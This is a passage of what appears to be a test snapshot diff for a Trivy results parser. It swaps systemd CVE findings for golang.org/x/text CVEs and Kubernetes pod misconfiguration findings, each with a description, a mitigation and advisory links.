"https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202208-02", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3843", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", "references": [ - "http://www.securityfocus.com/bid/108116", - "https://access.redhat.com/security/cve/CVE-2019-3843", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", - "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", - "https://linux.oracle.com/cve/CVE-2019-3843.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "systemd: services with DynamicUser can create SUID/SGID binaries", + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3843", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/108116", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3843", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-3844", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", "references": [ - "http://www.securityfocus.com/bid/108096", - "https://access.redhat.com/security/cve/CVE-2019-3844", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", - "https://linux.oracle.com/cve/CVE-2019-3844.html", - "https://linux.oracle.com/errata/ELSA-2020-1794.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", - "https://security.netapp.com/advisory/ntap-20190619-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-3844", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/108096", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-3844", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "241-7~deb10u9", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-26604", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2023-26604", - "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", - "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", - "https://github.com/systemd/systemd/issues/5666", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", - "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", - "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", - "https://security.netapp.com/advisory/ntap-20230505-0009/", - "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "privilege escalation via the less pager", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-26604", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-26604", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'etcd' of Pod 'etcd-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'etcd-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/5666", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "241-7~deb10u8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33910", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", - "https://access.redhat.com/security/cve/CVE-2021-33910", - "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", - "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", - "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", - "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", - "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", - "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", - "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", - "https://linux.oracle.com/cve/CVE-2021-33910.html", - "https://linux.oracle.com/errata/ELSA-2021-2717.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20211104-0008/", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33910", - "https://www.debian.org/security/2021/dsa-4942", - "https://www.openwall.com/lists/oss-security/2021/07/20/2", - "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", ], }, - "category": "Vulnerability", - "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33910", - }, - { - "type": "URL", - "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33910", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'etcd-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "apt", + "references": [ + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", 